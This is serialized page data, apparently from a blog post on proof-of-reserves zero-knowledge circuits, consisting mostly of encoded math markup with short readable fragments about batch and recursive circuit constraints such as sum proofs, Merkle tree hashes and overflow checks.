272},{"type":25,"tag":216,"props":98238,"children":98240},{"className":98239},[246,2151],[98241],{"type":31,"value":2196},{"type":25,"tag":216,"props":98243,"children":98245},{"className":98244},[246,2151],[98246],{"type":31,"value":2934},{"type":25,"tag":216,"props":98248,"children":98250},{"className":98249,"style":2752},[246],[98251],{"type":31,"value":7031},{"type":25,"tag":216,"props":98253,"children":98255},{"className":98254},[246,2151],[98256],{"type":31,"value":162},{"type":25,"tag":216,"props":98258,"children":98260},{"className":98259},[246,2151],[98261],{"type":31,"value":97009},{"type":25,"tag":216,"props":98263,"children":98265},{"className":98264},[246,2151],[98266],{"type":31,"value":2934},{"type":25,"tag":216,"props":98268,"children":98270},{"className":98269,"style":2752},[246],[98271],{"type":31,"value":7031},{"type":25,"tag":216,"props":98273,"children":98275},{"className":98274},[246,2151],[98276],{"type":31,"value":97025},{"type":25,"tag":216,"props":98278,"children":98280},{"className":98279,"style":97029},[246,2151],[98281],{"type":31,"value":97032},{"type":25,"tag":216,"props":98283,"children":98285},{"className":98284},[246,2151],[98286],{"type":31,"value":97038},{"type":25,"tag":216,"props":98288,"children":98290},{"className":98289},[246,2151],[98291],{"type":31,"value":97044},{"type":25,"tag":216,"props":98293,"children":98295},{"className":98294},[246],[98296,98301],{"type":25,"tag":216,"props":98297,"children":98299},{"className":98298},[246,2151],[98300],{"type":31,"value":3245},{"type":25,"tag":216,"props":98302,"children":98304},{"className":98303},[2159],[98305],{"type":25,"tag":216,"props":98306,"children":98308},{"className":98307},[298,299],[98309,98338],{"type":25,"tag":216,"props":98310,"children":98312},{"className":98311},[304],[98313,98333],{"type":25,"tag":216,"props":98314,"children":98316},{"className":98315,"style":2270},[309],[98317],{"type":25,"tag":216,"props":98318,"children":98319},{"style":2274},[98320,98324],{"type":25,"tag":216,"props":98321,"children":98323},{"className":98322,"style":2181},[319],[],{"type":25,"tag":216,"props":98325,"children":98327},{"className":98326},[2186,2187,2188,2189],[98328],{"type":25,"tag":216,"props":98329,"children":98331},{"className":98330},[246,2151,2189],[98332],{"type":31,"value":2289},{"type":25,"tag":216,"props":98334,"children":98336},{"className":98335},[408],[98337],{"type":31,"value":411},{"type":25,"tag":216,"props":98339,"children":98341},{"className":98340},[304],[98342],{"type":25,"tag":216,"props":98343,"children":98345},{"className":98344,"style":2209},[309],[98346],{"type":25,"tag":216,"props":98347,"children":98348},{},[],{"type":25,"tag":216,"props":98350,"children":98352},{"className":98351},[287],[98353],{"type":31,"value":7701},{"type":25,"tag":216,"props":98355,"children":98357},{"className":98356},[246,2151],[98358],{"type":31,"value":162},{"type":25,"tag":216,"props":98360,"children":98362},{"className":98361},[246,2151],[98363],{"type":31,"value":97009},{"type":25,"tag":216,"props":98365,"children":98367},{"className":98366},[246,2151],[98368],{"type":31,"value":2934},{"type":25,"tag":216,"props":98370,"children":98372},{"className":98371,"style":2752},[246],[98373],{"type":31,"value":7031},{"type":25,"tag":216,"props":98375,"children":98377},{"className":98376},[246,2151],[98378],{"type":31,"value":2196},{"type":25,"tag":216,"props":98380,"children":98382},{"className":98381},[246,2151],[98383],{"type":31,"value":97272},{"type":25,"tag":216,"props":98385,"children":98387},{"className":98386},[246,2151],[98388],{"type":31,"value":55102},{"type":25,"tag":216,"props":98390,"children":98392},{"className":98391},[427],[98393],{"type":31,"value":19368},{"type":31,"value":10409},{"type":25,"tag":9273,"props":98396,"children":98397},{},[98398],{"type":31,"value":98399},"(sum proof)",{"type":25,"tag":2043,"props":98401,"children":98402},{},[98403,98791,98792],{"type":25,"tag":82,"props":98404,"children":98406},{"className":98405},[212,4702],[98407],{"type":25,"tag":216,"props":98408,"children":98410},{"className":98409},[224],[98411],{"type":25,"tag":216,"props":98412,"children":98414},{"className":98413,"ariaHidden":230},[229],[98415,98500],{"type":25,"tag":216,"props":98416,"children":98418},{"className":98417},[235],[98419,98423,98428,98434,98440,98445,98450,98455,98460,98466,98471,98477,98482,98487,98491,98496],{"type":25,"tag":216,"props":98420,"children":98422},{"className":98421,"style":241},[240],[],{"type":25,"tag":216,"props":98424,"children":98426},{"className":98425},[246,2151],[98427],{"type":31,"value":55102},{"type":25,"tag":216,"props":98429,"children":98431},{"className":98430,"style":2752},[246,2151],[98432],{"type":31,"value":98433},"er",{"type":25,"tag":216,"props":98435,"children":98438},{"className":98436,"style":98437},[246,2151],"margin-right:0.03148em;",[98439],{"type":31,"value":92655},{"type":25,"tag":216,"props":98441,"children":98443},{"className":98442,"style":97029},[246,2151],[98444],{"type":31,"value":97032},{"type":25,"tag":216,"props":98446,"children":98448},{"className":98447},[246,2151],[98449],{"type":31,"value":2399},{"type":25,"tag":216,"props":98451,"children":98453},{"className":98452,"style":2752},[246],[98454],{"type":31,"value":7031},{"type":25,"tag":216,"props":98456,"children":98458},{"className":98457},[246,2151],[98459],{"type":31,"value":2934},{"type":25,"tag":216,"props":98461,"children":98463},{"className":98462},[246,2151],[98464],{"type":31,"value":98465},"ree",{"type":25,"tag":216,"props":98467,"children":98469},{"className":98468,"style":2752},[246],[98470],{"type":31,"value":7031},{"type":25,"tag":216,"props":98472,"children":98474},{"className":98473},[246,2151],[98475],{"type":31,"value":98476},"ha",{"type":25,"tag":216,"props":98478,"children":98480},{"className":98479},[246,2151],[98481],{"type":31,"value":3245},{"type":25,"tag":216,"props":98483,"children":98485},{"className":98484},[246,2151],[98486],{"type":31,"value":2611},{"type":25,"tag":216,"props":98488,"children":98490},{"className":98489,"style":258},[257],[],{"type":25,"tag":216,"props":98492,"children":98494},{"className":98493},[263],[98495],{"type":31,"value":12528},{"type":25,"tag":216,"props":98497,"children":98499},{"className":98498,"style":258},[257],[],{"type":25,"tag":216,"props":98501,"children":98503},{"className":98502},[235],[98504,98508,98513,98518,98523,98528,98533,98538,98543,98548,98553,98610,98615,98619,98624,98629,98686,98691,98696,98700,98705,98710,98714,98719,98724,98786],{"type":25,"tag":216,"props":98505,"children":98507},{"className":98506,"style":5513},[240],[],{"type":25,"tag":216,"props":98509,"children":98511},{"className":98510,"style":2152},[246,2151],[98512],{"type":31,"value":2155},{"type":25,"tag":216,"props":98514,"children":98516},{"className":98515},[246,2151],[98517],{"type":31,"value":96972},{"type":25,"tag":216,"props":98519,"children":98521},{"className":98520},[246,2151],[98522],{"type":31,"value":2289},{"type":25,"tag":216,"props":98524,"children":98526},{"className":98525},[246,2151],[98527],{"type":31,"value":74534},{"type":25,"tag":216,"props":98529,"children":98531},{"className":98530},[246,2151],[98532],{"type":31,"value":96988},{"type":25,"tag":216,"props":98534,"children":98536},{"className":98535},[246,2151],[98537],{"type":31,"value":2196},{"type":25,"tag":216,"props":98539,"children":98541},{"className":98540},[287],[98542],{"type":31,"value":1850},{"type":25,"tag":216,"props":98544,"children":98546},{"className":98545},[246,2151],[98547],{"type":31,"value":98476},{"type":25,"tag":216,"props":98549,"children":98551},{"className":98550},[246,2151],[98552],{"type":31,"value":3245},{"type":25,"tag":216,"props":98554,"children":98556},{"className":98555},[246],[98557,98562],{"type":25,"tag":216,"props":98558,"children":98560},{"className":98559},[246,2151],[98561],{"type":31,"value":2611},{"type":25,"tag":216,"props":98563,"children":98565},{"className":98564},[2159],[98566],{"type":25,"tag":216,"props":98567,"children":98569},{"className":98568},[298,299],[98570,98599],{"type":25,"tag":216,"props":98571,"children":98573},{"className":98572},[304],[98574,98594],{"type":25,"tag":216,"props":98575,"children":98577},{"className":98576,"style":97069},[309],[98578],{"type":25,"tag":216,"props":98579,"children":98580},{"style":2274},[98581,98585],{"type":25,"tag":216,"props":98582,"children":98584},{"className":98583,"style":2181},[319],[],{"type":25,"tag":216,"props":98586,"children":98588},{"className":98587},[2186,2187,2188,2189],[98589],{"type":25,"tag":216,"props":98590,"children":98592},{"className":98591},[246,2189],[98593],{"type":31,"value":1882},{"type":25,"tag":216,"props":98595,"children":98597},{"className":98596},[408],[98598],{"type":31,"value":411},{"type":25,"tag":216,"props":98600,"children":98602},{"className":98601},[304],[98603],{"type":25,"tag":216,"props":98604,"children":98606},{"className":98605,"style":2209},[309],[98607],{"type":25,"tag":216,"props":98608,"children":98609},{},[],{"type":25,"tag":216,"props":98611,"children":98613},{"className":98612},[1864],[98614],{"type":31,"value":1867},{"type":25,"tag":216,"props":98616,"children":98618},{"className":98617,"style":1871},[257],[],{"type":25,"tag":216,"props":98620,"children":98622},{"className":98621},[246,2151],[98623],{"type":31,"value":98476},{"type":25,"tag":216,"props":98625,"children":98627},{"className":98626},[246,2151],[98628],{"type":31,"value":3245},{"type":25,"tag":216,"props":98630,"children":98632},{"className":98631},[246],[98633,98638],{"type":25,"tag":216,"props":98634,"children":98636},{"className":98635},[246,2151],[98637],{"type":31,"value":2611},{"type":25,"tag":216,"props":98639,"children":98641},{"className":98640},[2159],[98642],{"type":25,"tag":216,"props":98643,"children":98645},{"className":98644},[298,299],[98646,98675],{"type":25,"tag":216,"props":98647,"children":98649},{"className":98648},[304],[98650,98670],{"type":25,"tag":216,"props":98651,"children":98653},{"className":98652,"style":97069},[309],[98654],{"type":25,"tag":216,"props":98655,"children":98656},{"style":2274},[98657,98661],{"type":25,"tag":216,"props":98658,"children":98660},{"className":98659,"style":2181},[319],[],{"type":25,"tag":216,"props":98662,"children":98664},{"className":98663},[2186,2187,2188,2189],[98665],{"type":25,"tag":216,"props":98666,"children":98668},{"className":98667},[246,2189],[98669],{"type":31,"value":184},{"type":25,"tag":216,"props":98671,"children":98673},{"className":98672},[408],[98674],{"type":31,"value":411},{"type":25,"tag":216,"props":98676,"children":98678},{"className":98677},[304],[98679],{"type":25,"tag":216,"props":98680,"children":98682},{"className":98681,"style":2209},[309],[98683],{"type":25,"tag":216,"props":98684,"children":98685},{},[],{"type":25,"tag":216,"props":98687,"children":98689},{"className":98688},[1864],[98690],{"type":31,"value":1867},{"type":25,"tag":216,"props":98692,"children":98694},{"className":98693},[257],[98695],{"type":31,"value":25641},{"type":25,"tag":216,"props":98697,"children":98699},{"className":98698,"style":1871},[257],[],{"type":25,"tag":216,"props":98701,"children":98703},{"className":98702},[246],[98704],{"type":31,"value":13547},{"type":25,"tag":216,"props":98706,"children":98708},{"className":98707},[1864],[98709],{"type":31,"value":1867},{"type":25,"tag":216,"props":98711,"children":98713},{"className":98712,"style":1871},[257],[],{"type":25,"tag":216,"props":98715,"children":98717},{"className":98716},[246,2151],[98718],{"type":31,"value":98476},{"type":25,"tag":216,"props":98720,"children":98722},{"className":98721},[246,2151],[98723],{"type":31,"value":3245},{"type":25,"tag":216,"props":98725,"children":98727},{"className":98726},[246],[98728,98733],{"type":25,"tag":216,"props":98729,"children":98731},{"className":98730},[246,2151],[98732],{"type":31,"value":2611},{"type":25,"tag":216,"props":98734,"children":98736},{"className":98735},[2159],[98737],{"type":25,"tag":216,"props":98738,"children":98740},{"className":98739},[298,299],[98741,98775],{"type":25,"tag":216,"props":98742,"children":98744},{"className":98743},[304],[98745,98770],{"type":25,"tag":216,"props":98746,"children":98748},{"className":98747,"style":97069},[309],[98749],{"type":25,"tag":216,"props":98750,"children":98751},{"style":2274},[98752,98756],{"type":25,"tag":216,"props":98753,"children":98755},{"className":98754,"style":2181},[319],[],{"type":25,"tag":216,"props":98757,"children":98759},{"className":98758},[2186,2187,2188,2189],[98760],{"type":25,"tag":216,"props":98761,"children":98763},{"className":98762},[246,2189],[98764],{"type":25,"tag":216,"props":98765,"children":98767},{"className":98766},[246,2189],[98768],{"type":31,"value":98769},"511",{"type":25,"tag":216,"props":98771,"children":98773},{"className":98772},[408],[98774],{"type":31,"value":411},{"type":25,"tag":216,"props":98776,"children":98778},{"className":98777},[304],[98779],{"type":25,"tag":216,"props":98780,"children":98782},{"className":98781,"style":2209},[309],[98783],{"type":25,"tag":216,"props":98784,"children":98785},{},[],{"type":25,"tag":216,"props":98787,"children":98789},{"className":98788},[427],[98790],{"type":31,"value":1888},{"type":31,"value":10409},{"type":25,"tag":9273,"props":98793,"children":98794},{},[98795],{"type":31,"value":98796},"(merkle tree hash)",{"type":25,"tag":2043,"props":98798,"children":98799},{},[98800,99072,99073,99078,99080,99085],{"type":25,"tag":82,"props":98801,"children":98803},{"className":98802},[212,4702],[98804],{"type":25,"tag":216,"props":98805,"children":98807},{"className":98806},[224],[98808],{"type":25,"tag":216,"props":98809,"children":98811},{"className":98810,"ariaHidden":230},[229],[98812,99005],{"type":25,"tag":216,"props":98813,"children":98815},{"className":98814},[235],[98816,98820,98825,98830,98835,98840,98845,98850,98855,98860,98865,98870,98875,98880,98885,98890,98947,98952,98957,98962,98967,98972,98977,98982,98987,98992,98996,99001],{"type":25,"tag":216,"props":98817,"children":98819},{"className":98818,"style":96960},[240],[],{"type":25,"tag":216,"props":98821,"children":98823},{"className":98822},[246,2151],[98824],{"type":31,"value":162},{"type":25,"tag":216,"props":98826,"children":98828},{"className":98827},[246,2151],[98829],{"type":31,"value":97470},{"type":25,"tag":216,"props":98831,"children":98833},{"className":98832},[246,2151],[98834],{"type":31,"value":97272},{"type":25,"tag":216,"props":98836,"children":98838},{"className":98837},[246,2151],[98839],{"type":31,"value":2196},{"type":25,"tag":216,"props":98841,"children":98843},{"className":98842},[246,2151],[98844],{"type":31,"value":2934},{"type":25,"tag":216,"props":98846,"children":98848},{"className":98847,"style":2752},[246],[98849],{"type":31,"value":7031},{"type":25,"tag":216,"props":98851,"children":98853},{"className":98852},[246,2151],[98854],{"type":31,"value":162},{"type":25,"tag":216,"props":98856,"children":98858},{"className":98857},[246,2151],[98859],{"type":31,"value":97009},{"type":25,"tag":216,"props":98861,"children":98863},{"className":98862},[246,2151],[98864],{"type":31,"value":2934},{"type":25,"tag":216,"props":98866,"children":98868},{"className":98867,"style":2752},[246],[98869],{"type":31,"value":7031},{"type":25,"tag":216,"props":98871,"children":98873},{"className":98872},[246,2151],[98874],{"type":31,"value":97025},{"type":25,"tag":216,"props":98876,"children":98878},{"className":98877,"style":97029},[246,2151],[98879],{"type":31,"value":97032},{"type":25,"tag":216,"props":98881,"children":98883},{"className":98882},[246,2151],[98884],{"type":31,"value":97038},{"type":25,"tag":216,"props":98886,"children":98888},{"className":98887},[246,2151],[98889],{"type":31,"value":97044},{"type":25,"tag":216,"props":98891,"children":98893},{"className":98892},[246],[98894,98899],{"type":25,"tag":216,"props":98895,"children":98897},{"className":98896},[246,2151],[98898],{"type":31,"value":3245},{"type":25,"tag":216,"props":98900,"children":98902},{"className":98901},[2159],[98903],{"type":25,"tag":216,"props":98904,"children":98906},{"className":98905},[298,299],[98907,98936],{"type":25,"tag":216,"props":98908,"children":98910},{"className":98909},[304],[98911,98931],{"type":25,"tag":216,"props":98912,"children":98914},{"className":98913,"style":2270},[309],[98915],{"type":25,"tag":216,"props":98916,"children":98917},{"style":2274},[98918,98922],{"type":25,"tag":216,"props":98919,"children":98921},{"className":98920,"style":2181},[319],[],{"type":25,"tag":216,"props":98923,"children":98925},{"className":98924},[2186,2187,2188,2189],[98926],{"type":25,"tag":216,"props":98927,"children":98929},{"className":98928},[246,2151,2189],[98930],{"type":31,"value":2289},{"type":25,"tag":216,"props":98932,"children":98934},{"className":98933},[408],[98935],{"type":31,"value":411},{"type":25,"tag":216,"props":98937,"children":98939},{"className":98938},[304],[98940],{"type":25,"tag":216,"props":98941,"children":98943},{"className":98942,"style":2209},[309],[98944],{"type":25,"tag":216,"props":98945,"children":98946},{},[],{"type":25,"tag":216,"props":98948,"children":98950},{"className":98949},[287],[98951],{"type":31,"value":7701},{"type":25,"tag":216,"props":98953,"children":98955},{"className":98954},[246,2151],[98956],{"type":31,"value":162},{"type":25,"tag":216,"props":98958,"children":98960},{"className":98959},[246,2151],[98961],{"type":31,"value":97009},{"type":25,"tag":216,"props":98963,"children":98965},{"className":98964},[246,2151],[98966],{"type":31,"value":2934},{"type":25,"tag":216,"props":98968,"children":98970},{"className":98969,"style":2752},[246],[98971],{"type":31,"value":7031},{"type":25,"tag":216,"props":98973,"children":98975},{"className":98974},[246,2151],[98976],{"type":31,"value":2196},{"type":25,"tag":216,"props":98978,"children":98980},{"className":98979},[246,2151],[98981],{"type":31,"value":97272},{"type":25,"tag":216,"props":98983,"children":98985},{"className":98984},[246,2151],[98986],{"type":31,"value":55102},{"type":25,"tag":216,"props":98988,"children":98990},{"className":98989},[427],[98991],{"type":31,"value":19368},{"type":25,"tag":216,"props":98993,"children":98995},{"className":98994,"style":258},[257],[],{"type":25,"tag":216,"props":98997,"children":98999},{"className":98998},[263],[99000],{"type":31,"value":9757},{"type":25,"tag":216,"props":99002,"children":99004},{"className":99003,"style":258},[257],[],{"type":25,"tag":216,"props":99006,"children":99008},{"className":99007},[235],[99009,99013,99019,99024,99029,99034,99039,99044,99050,99055,99060,99066],{"type":25,"tag":216,"props":99010,"children":99012},{"className":99011,"style":96960},[240],[],{"type":25,"tag":216,"props":99014,"children":99016},{"className":99015,"style":2824},[246,2151],[99017],{"type":31,"value":99018},"M",{"type":25,"tag":216,"props":99020,"children":99022},{"className":99021},[246,2151],[99023],{"type":31,"value":80739},{"type":25,"tag":216,"props":99025,"children":99027},{"className":99026,"style":2229},[246,2151],[99028],{"type":31,"value":10084},{"type":25,"tag":216,"props":99030,"children":99032},{"className":99031,"style":2752},[246],[99033],{"type":31,"value":7031},{"type":25,"tag":216,"props":99035,"children":99037},{"className":99036,"style":5269},[246,2151],[99038],{"type":31,"value":5272},{"type":25,"tag":216,"props":99040,"children":99042},{"className":99041},[246,2151],[99043],{"type":31,"value":80739},{"type":25,"tag":216,"props":99045,"children":99047},{"className":99046,"style":5269},[246,2151],[99048],{"type":31,"value":99049},"FE",{"type":25,"tag":216,"props":99051,"children":99053},{"className":99052,"style":2752},[246],[99054],{"type":31,"value":7031},{"type":25,"tag":216,"props":99056,"children":99058},{"className":99057,"style":2229},[246,2151],[99059],{"type":31,"value":2232},{"type":25,"tag":216,"props":99061,"children":99063},{"className":99062,"style":2152},[246,2151],[99064],{"type":31,"value":99065},"NT",{"type":25,"tag":216,"props":99067,"children":99069},{"className":99068},[246],[99070],{"type":31,"value":99071},"/512",{"type":31,"value":10409},{"type":25,"tag":9273,"props":99074,"children":99075},{},[99076],{"type":31,"value":99077},"(overflow check)",{"type":31,"value":99079}," --> overflow check is made this way for performance (note that 512 is actually the ",{"type":25,"tag":82,"props":99081,"children":99083},{"className":99082},[],[99084],{"type":31,"value":96876},{"type":31,"value":1888},{"type":25,"tag":38,"props":99087,"children":99088},{},[99089],{"type":31,"value":99090},"Here is a visual scheme of the inputs of the batch circuit + how user hashes are generated:",{"type":25,"tag":38,"props":99092,"children":99093},{},[99094],{"type":25,"tag":6467,"props":99095,"children":99097},{"alt":54547,"src":99096},"/posts/por/batch-circuit-inputs.png",[],{"type":25,"tag":606,"props":99099,"children":99101},{"id":99100},"recursive-circuit",[99102],{"type":31,"value":99103},"Recursive Circuit",{"type":25,"tag":38,"props":99105,"children":99106},{},[99107],{"type":31,"value":99108},"Recursive circuits get eight subproofs as input, verify if all the asset prices are the same, and calculate the summed balances and Merkle hash. Here are the constraints.",{"type":25,"tag":38,"props":99110,"children":99111},{},[99112],{"type":25,"tag":9273,"props":99113,"children":99114},{},[99115],{"type":31,"value":97385},{"type":25,"tag":2039,"props":99117,"children":99118},{},[99119,99123,99128],{"type":25,"tag":2043,"props":99120,"children":99121},{},[99122],{"type":31,"value":97403},{"type":25,"tag":2043,"props":99124,"children":99125},{},[99126],{"type":31,"value":99127},"Asset prices",{"type":25,"tag":2043,"props":99129,"children":99130},{},[99131],{"type":31,"value":97398},{"type":25,"tag":38,"props":99133,"children":99134},{},[99135],{"type":25,"tag":9273,"props":99136,"children":99137},{},[99138],{"type":31,"value":97411},{"type":25,"tag":2039,"props":99140,"children":99141},{},[99142],{"type":25,"tag":2043,"props":99143,"children":99144},{},[99145],{"type":31,"value":99146},"8 subproofs",{"type":25,"tag":38,"props":99148,"children":99149},{},[99150],{"type":25,"tag":9273,"props":99151,"children":99152},{},[99153],{"type":31,"value":97432},{"type":25,"tag":2039,"props":99155,"children":99156},{},[99157,99567,99898,100265,100652],{"type":25,"tag":2043,"props":99158,"children":99159},{},[99160,99562,99563],{"type":25,"tag":82,"props":99161,"children":99163},{"className":99162},[212,4702],[99164],{"type":25,"tag":216,"props":99165,"children":99167},{"className":99166},[224],[99168],{"type":25,"tag":216,"props":99169,"children":99171},{"className":99170,"ariaHidden":230},[229],[99172,99308],{"type":25,"tag":216,"props":99173,"children":99175},{"className":99174},[235],[99176,99180,99185,99190,99195,99200,99205,99210,99215,99220,99225,99230,99235,99240,99245,99250,99255,99260,99265,99270,99275,99280,99285,99290,99295,99299,99304],{"type":25,"tag":216,"props":99177,"children":99179},{"className":99178,"style":96960},[240],[],{"type":25,"tag":216,"props":99181,"children":99183},{"className":99182},[246,2151],[99184],{"type":31,"value":2934},{"type":25,"tag":216,"props":99186,"children":99188},{"className":99187},[246,2151],[99189],{"type":31,"value":96988},{"type":25,"tag":216,"props":99191,"children":99193},{"className":99192},[246,2151],[99194],{"type":31,"value":2934},{"type":25,"tag":216,"props":99196,"children":99198},{"className":99197},[246,2151],[99199],{"type":31,"value":162},{"type":25,"tag":216,"props":99201,"children":99203},{"className":99202,"style":97029},[246,2151],[99204],{"type":31,"value":97032},{"type":25,"tag":216,"props":99206,"children":99208},{"className":99207,"style":2752},[246],[99209],{"type":31,"value":7031},{"type":25,"tag":216,"props":99211,"children":99213},{"className":99212},[246,2151],[99214],{"type":31,"value":162},{"type":25,"tag":216,"props":99216,"children":99218},{"className":99217},[246,2151],[99219],{"type":31,"value":97009},{"type":25,"tag":216,"props":99221,"children":99223},{"className":99222},[246,2151],[99224],{"type":31,"value":2934},{"type":25,"tag":216,"props":99226,"children":99228},{"className":99227,"style":2752},[246],[99229],{"type":31,"value":7031},{"type":25,"tag":216,"props":99231,"children":99233},{"className":99232},[246,2151],[99234],{"type":31,"value":97025},{"type":25,"tag":216,"props":99236,"children":99238},{"className":99237,"style":97029},[246,2151],[99239],{"type":31,"value":97032},{"type":25,"tag":216,"props":99241,"children":99243},{"className":99242},[246,2151],[99244],{"type":31,"value":97038},{"type":25,"tag":216,"props":99246,"children":99248},{"className":99247},[246,2151],[99249],{"type":31,"value":97044},{"type":25,"tag":216,"props":99251,"children":99253},{"className":99252},[287],[99254],{"type":31,"value":7701},{"type":25,"tag":216,"props":99256,"children":99258},{"className":99257},[246,2151],[99259],{"type":31,"value":162},{"type":25,"tag":216,"props":99261,"children":99263},{"className":99262},[246,2151],[99264],{"type":31,"value":97009},{"type":25,"tag":216,"props":99266,"children":99268},{"className":99267},[246,2151],[99269],{"type":31,"value":2934},{"type":25,"tag":216,"props":99271,"children":99273},{"className":99272,"style":2752},[246],[99274],{"type":31,"value":7031},{"type":25,"tag":216,"props":99276,"children":99278},{"className":99277},[246,2151],[99279],{"type":31,"value":2196},{"type":25,"tag":216,"props":99281,"children":99283},{"className":99282},[246,2151],[99284],{"type":31,"value":97272},{"type":25,"tag":216,"props":99286,"children":99288},{"className":99287},[246,2151],[99289],{"type":31,"value":55102},{"type":25,"tag":216,"props":99291,"children":99293},{"className":99292},[427],[99294],{"type":31,"value":19368},{"type":25,"tag":216,"props":99296,"children":99298},{"className":99297,"style":258},[257],[],{"type":25,"tag":216,"props":99300,"children":99302},{"className":99301},[263],[99303],{"type":31,"value":12528},{"type":25,"tag":216,"props":99305,"children":99307},{"className":99306,"style":258},[257],[],{"type":25,"tag":216,"props":99309,"children":99311},{"className":99310},[235],[99312,99316,99321,99326,99331,99336,99341,99346,99352,99411,99416,99421,99426,99431,99436,99441,99446,99451,99457,99462,99467,99472,99477,99482,99487,99492,99497,99502,99507,99512,99517,99522,99527,99532,99537,99542,99547,99552,99557],{"type":25,"tag":216,"props":99313,"children":99315},{"className":99314,"style":96960},[240],[],{"type":25,"tag":216,"props":99317,"children":99319},{"className":99318},[246],[99320],{"type":31,"value":97600},{"type":25,"tag":216,"props":99322,"children":99324},{"className":99323},[257],[99325],{"type":31,"value":25641},{"type":25,"tag":216,"props":99327,"children":99329},{"className":99328},[246,2151],[99330],{"type":31,"value":3245},{"type":25,"tag":216,"props":99332,"children":99334},{"className":99333},[246,2151],[99335],{"type":31,"value":97272},{"type":25,"tag":216,"props":99337,"children":99339},{"className":99338},[246,2151],[99340],{"type":31,"value":7171},{"type":25,"tag":216,"props":99342,"children":99344},{"className":99343},[246,2151],[99345],{"type":31,"value":38},{"type":25,"tag":216,"props":99347,"children":99349},{"className":99348},[246,2151],[99350],{"type":31,"value":99351},"roo",{"type":25,"tag":216,"props":99353,"children":99355},{"className":99354},[246],[99356,99362],{"type":25,"tag":216,"props":99357,"children":99360},{"className":99358,"style":99359},[246,2151],"margin-right:0.10764em;",[99361],{"type":31,"value":37047},{"type":25,"tag":216,"props":99363,"children":99365},{"className":99364},[2159],[99366],{"type":25,"tag":216,"props":99367,"children":99369},{"className":99368},[298,299],[99370,99400],{"type":25,"tag":216,"props":99371,"children":99373},{"className":99372},[304],[99374,99395],{"type":25,"tag":216,"props":99375,"children":99377},{"className":99376,"style":2270},[309],[99378],{"type":25,"tag":216,"props":99379,"children":99381},{"style":99380},"top:-2.55em;margin-left:-0.1076em;margin-right:0.05em;",[99382,99386],{"type":25,"tag":216,"props":99383,"children":99385},{"className":99384,"style":2181},[319],[],{"type":25,"tag":216,"props":99387,"children":99389},{"className":99388},[2186,2187,2188,2189],[99390],{"type":25,"tag":216,"props":99391,"children":99393},{"className":99392},[246,2151,2189],[99394],{"type":31,"value":2289},{"type":25,"tag":216,"props":99396,"children":99398},{"className":99397},[408],[99399],{"type":31,"value":411},{"type":25,"tag":216,"props":99401,"children":99403},{"className":99402},[304],[99404],{"type":25,"tag":216,"props":99405,"children":99407},{"className":99406,"style":2209},[309],[99408],{"type":25,"tag":216,"props":99409,"children":99410},{},[],{"type":25,"tag":216,"props":99412,"children":99414},{"className":99413},[246],[99415],{"type":31,"value":179},{"type":25,"tag":216,"props":99417,"children":99419},{"className":99418},[246,2151],[99420],{"type":31,"value":38},{"type":25,"tag":216,"props":99422,"children":99424},{"className":99423},[246,2151],[99425],{"type":31,"value":97272},{"type":25,"tag":216,"props":99427,"children":99429},{"className":99428},[246,2151],[99430],{"type":31,"value":7171},{"type":25,"tag":216,"props":99432,"children":99434},{"className":99433,"style":97029},[246,2151],[99435],{"type":31,"value":97032},{"type":25,"tag":216,"props":99437,"children":99439},{"className":99438},[246,2151],[99440],{"type":31,"value":2289},{"type":25,"tag":216,"props":99442,"children":99444},{"className":99443},[246,2151],[99445],{"type":31,"value":2254},{"type":25,"tag":216,"props":99447,"children":99449},{"className":99448,"style":2752},[246],[99450],{"type":31,"value":7031},{"type":25,"tag":216,"props":99452,"children":99454},{"className":99453},[246,2151],[99455],{"type":31,"value":99456},"in",{"type":25,"tag":216,"props":99458,"children":99460},{"className":99459},[246,2151],[99461],{"type":31,"value":38},{"type":25,"tag":216,"props":99463,"children":99465},{"className":99464},[246,2151],[99466],{"type":31,"value":97272},{"type":25,"tag":216,"props":99468,"children":99470},{"className":99469},[246,2151],[99471],{"type":31,"value":2934},{"type":25,"tag":216,"props":99473,"children":99475},{"className":99474},[246],[99476],{"type":31,"value":179},{"type":25,"tag":216,"props":99478,"children":99480},{"className":99479},[246,2151],[99481],{"type":31,"value":162},{"type":25,"tag":216,"props":99483,"children":99485},{"className":99484},[246,2151],[99486],{"type":31,"value":97009},{"type":25,"tag":216,"props":99488,"children":99490},{"className":99489},[246,2151],[99491],{"type":31,"value":2934},{"type":25,"tag":216,"props":99493,"children":99495},{"className":99494,"style":2752},[246],[99496],{"type":31,"value":7031},{"type":25,"tag":216,"props":99498,"children":99500},{"className":99499},[246,2151],[99501],{"type":31,"value":97025},{"type":25,"tag":216,"props":99503,"children":99505},{"className":99504,"style":97029},[246,2151],[99506],{"type":31,"value":97032},{"type":25,"tag":216,"props":99508,"children":99510},{"className":99509},[246,2151],[99511],{"type":31,"value":97038},{"type":25,"tag":216,"props":99513,"children":99515},{"className":99514},[246,2151],[99516],{"type":31,"value":97840},{"type":25,"tag":216,"props":99518,"children":99520},{"className":99519},[287],[99521],{"type":31,"value":7701},{"type":25,"tag":216,"props":99523,"children":99525},{"className":99524},[246,2151],[99526],{"type":31,"value":162},{"type":25,"tag":216,"props":99528,"children":99530},{"className":99529},[246,2151],[99531],{"type":31,"value":97009},{"type":25,"tag":216,"props":99533,"children":99535},{"className":99534},[246,2151],[99536],{"type":31,"value":2934},{"type":25,"tag":216,"props":99538,"children":99540},{"className":99539,"style":2752},[246],[99541],{"type":31,"value":7031},{"type":25,"tag":216,"props":99543,"children":99545},{"className":99544},[246,2151],[99546],{"type":31,"value":2196},{"type":25,"tag":216,"props":99548,"children":99550},{"className":99549},[246,2151],[99551],{"type":31,"value":97272},{"type":25,"tag":216,"props":99553,"children":99555},{"className":99554},[246,2151],[99556],{"type":31,"value":55102},{"type":25,"tag":216,"props":99558,"children":99560},{"className":99559},[427],[99561],{"type":31,"value":19368},{"type":31,"value":10409},{"type":25,"tag":9273,"props":99564,"children":99565},{},[99566],{"type":31,"value":98399},{"type":25,"tag":2043,"props":99568,"children":99569},{},[99570],{"type":25,"tag":82,"props":99571,"children":99573},{"className":99572},[212,4702],[99574],{"type":25,"tag":216,"props":99575,"children":99577},{"className":99576},[224],[99578],{"type":25,"tag":216,"props":99579,"children":99581},{"className":99580,"ariaHidden":230},[229],[99582,99688],{"type":25,"tag":216,"props":99583,"children":99585},{"className":99584},[235],[99586,99590,99595,99600,99605,99610,99615,99620,99625,99630,99635,99640,99645,99650,99655,99660,99665,99670,99675,99679,99684],{"type":25,"tag":216,"props":99587,"children":99589},{"className":99588,"style":96960},[240],[],{"type":25,"tag":216,"props":99591,"children":99593},{"className":99592},[246,2151],[99594],{"type":31,"value":162},{"